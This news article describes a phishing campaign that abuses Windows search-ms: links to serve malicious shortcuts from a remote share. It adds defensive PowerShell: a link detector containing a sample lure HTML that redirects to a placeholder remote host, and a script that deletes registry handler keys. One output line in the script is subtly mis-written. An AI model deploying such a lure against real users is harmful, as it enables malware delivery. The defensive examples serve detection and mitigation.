Hackers are hijacking Windows Search to hit victims with malware


Researchers have discovered a low-volume but clever cybercrime campaign that abuses the Windows search protocol to trick victims into downloading malware.

The campaign was discovered by cybersecurity researchers at Trustwave SpiderLabs, who described it as “clever” and noted that it has so far been seen only in low volume.

“This technique cleverly obscures the attacker’s true intent, exploiting the trust users place in familiar interfaces and common actions like opening email attachments,” the researchers said in their write-up.

Be wary of your inbox

The attack starts with a phishing email posing as an invoice or something similar. The attachment is a .ZIP archive containing an HTML file, which lets it slip past antivirus and email security products that do not inspect compressed contents.

When opened, the HTML file redirects the browser to a search-ms: link, a URI scheme that is registered to Windows Explorer’s search function (modern browsers first ask whether to open it in Explorer). The link instructs Explorer to search for items labeled “INVOICE” in a specific location: not a folder on the victim’s disk, but a remote server exposed through a Cloudflare tunnel. The search window is also given the display name “Downloads”, so the victim believes they are looking at a file they have just downloaded rather than at the contents of a remote share.

Among the “results” presented is a shortcut file (.LNK) that points to a batch script (.BAT) hosted on the same server. Opening the shortcut runs the script, which then carries out the next stage of the attack.

By the time the researchers began analyzing the campaign, the server had been taken down, so they were unable to retrieve the payload. It is therefore not known what kind of malware the attackers were distributing.
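The lure relies on a search-ms: URI whose parameters (query, crumb=location and displayname, all documented Windows search-protocol parameters) tell Explorer what to look for, where, and what to call the window. The following PowerShell is an added example, not code from the article or from Trustwave’s write-up: it scans an HTML attachment for search-ms:/search: links, parses those parameters, and flags any search pointed at a remote (UNC or HTTP) location. The sample HTML and the hostname in it are constructed for this example.

```powershell
# Added example: find search-ms:/search: links in an HTML attachment and show
# what each would make Windows Explorer do. Not the researchers' code.
# The HTML below is constructed for this example; the hostname is a placeholder.
$SampleHtml = @'
<html><head>
<meta http-equiv="refresh" content="0;url=search-ms:query=INVOICE&amp;crumb=location:\\example-tunnel.invalid@SSL\DavWWWRoot&amp;displayname=Downloads">
</head><body>Please wait while your invoice loads...</body></html>
'@

function Get-SearchMsLink {
    param([Parameter(Mandatory)][string]$Html)

    # Both "search-ms:" and "search:" are registered to Explorer's search handler.
    # Stop at quotes, angle brackets and whitespace so the match ends with the attribute.
    $pattern = '(?i)search(?:-ms)?:[^"''<>\s]+'

    foreach ($m in [regex]::Matches($Html, $pattern)) {
        # Attributes are HTML-encoded, so "&amp;" separates parameters in the raw file.
        $uri = [System.Net.WebUtility]::HtmlDecode($m.Value)
        $scheme, $rest = $uri -split ':', 2

        # Parameters are "&"-separated key=value pairs after the scheme.
        $params = @{}
        foreach ($pair in ($rest -split '&')) {
            $k, $v = $pair -split '=', 2
            if ($k -and $null -ne $v) {
                $params[$k.ToLower()] = [uri]::UnescapeDataString($v)
            }
        }

        # crumb=location:<path> is where Explorer will search.
        $location = ''
        if ($params['crumb'] -match '^location:(.*)$') { $location = $Matches[1] }

        [pscustomobject]@{
            Scheme      = $scheme
            Query       = $params['query']
            Location    = $location
            DisplayName = $params['displayname']
            # A UNC path (\\host\share, including WebDAV host@SSL\DavWWWRoot) or an
            # http(s) URL means Explorer will reach out to a server the attacker controls.
            Remote      = (($location -match '^\\\\') -or ($location -match '^https?://'))
        }
    }
}

Get-SearchMsLink -Html $SampleHtml | Format-List
```

Run against the sample, the function reports a search for “INVOICE” at a remote WebDAV location with the display name “Downloads”, which is exactly the combination described above. In practice the same function can be applied to the HTML extracted from each .ZIP attachment at the mail gateway; any hit with Remote set to true deserves quarantine, since a legitimate invoice has no reason to open a search against an external server.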

To mitigate the threat, administrators can disable the search-ms: and search: URI protocol handlers by deleting the HKEY_CLASSES_ROOT\search-ms and HKEY_CLASSES_ROOT\search registry keys. This stops a browser from handing such links to Windows Explorer, at the cost of breaking any legitimate use of those links, so the keys should be backed up before removal.
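The following PowerShell is an added example of that mitigation, not a script from the article or from the researchers. It exports the two handler keys to .reg files so the change can be reverted with reg import, removes the keys, and then verifies that neither handler is still registered. It must be run from an elevated prompt; the backup folder name is an assumption.

```powershell
# Added example: disable the search-ms: and search: protocol handlers.
# Not the researchers' script. Run elevated. Backup folder is an assumption.
$BackupDir = Join-Path $env:ProgramData 'search-protocol-backup'
$HandlerKeys = 'search-ms', 'search'

function Backup-SearchProtocolHandler {
    # Export each handler key with reg.exe so it can be restored later with:
    #   reg import C:\ProgramData\search-protocol-backup\search-ms.reg
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    foreach ($key in $HandlerKeys) {
        if (Test-Path "Registry::HKEY_CLASSES_ROOT\$key") {
            & reg.exe export "HKEY_CLASSES_ROOT\$key" (Join-Path $BackupDir "$key.reg") /y | Out-Null
        }
    }
}

function Remove-SearchProtocolHandler {
    # Delete the handler keys; returns the names of the keys actually removed.
    # HKEY_CLASSES_ROOT is a merged view of HKLM\Software\Classes and
    # HKCU\Software\Classes, so the per-user key is also checked explicitly.
    $removed = @()
    foreach ($key in $HandlerKeys) {
        foreach ($path in "Registry::HKEY_CLASSES_ROOT\$key", "HKCU:\Software\Classes\$key") {
            if (Test-Path $path) {
                Remove-Item -Path $path -Recurse -Force
                $removed += $path
            }
        }
    }
    $removed
}

function Test-SearchProtocolHandler {
    # $true while either handler is still registered (machine- or user-wide).
    foreach ($key in $HandlerKeys) {
        if (Test-Path "Registry::HKEY_CLASSES_ROOT\$key") { return $true }
        if (Test-Path "HKCU:\Software\Classes\$key")       { return $true }
    }
    $false
}

Backup-SearchProtocolHandler
Remove-SearchProtocolHandler
if (Test-SearchProtocolHandler) {
    Write-Warning 'A search protocol handler is still registered; check permissions and HKCU.'
} else {
    Write-Output 'search-ms: and search: handlers removed; backups in ' + $BackupDir
}
```

After the keys are gone, a browser that encounters a search-ms: link has no application to hand it to and the lure fails at the first step. Remember that any internal tooling or documentation that relies on search-ms: links will stop working, which is why the backup is taken first.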

Alternatively, they should be wary of incoming emails carrying attachments: “As users continue to navigate an increasingly complex threat landscape, ongoing education, and proactive security strategies remain paramount in safeguarding against such deceptive tactics,” the researchers concluded.

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.